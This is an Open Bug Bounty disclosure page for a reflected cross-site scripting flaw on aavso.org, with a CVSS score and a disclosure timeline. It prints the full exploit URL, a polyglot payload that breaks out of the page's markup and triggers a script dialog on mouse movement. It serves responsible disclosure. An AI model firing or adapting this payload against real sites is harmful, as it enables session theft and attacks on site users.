
aavso.org XSS vulnerability

Description

##### Open Bug Bounty ID: OBB-446158

Description| Value
---|---
Affected Website:| aavso.org
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

##### Vulnerable URL:

```
http://www.aavso.org/vsx/index.php?image=poss2ukstu_red%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3C/Title/%3C/script/%3E%3CInput%20Type=Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm`1`%20//%3E&oid;=133921&view;=detail.top#
```

##### Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 1 December, 2017 13:02 GMT
Vulnerability Verified:| 4 December, 2017 06:03 GMT
Website Operator Notified:| 4 December, 2017 06:03 GMT
Vulnerability Published:| 4 December, 2017 06:03 GMT [without any technical details]
Public Disclosure:| 1 March, 2018 13:02 GMT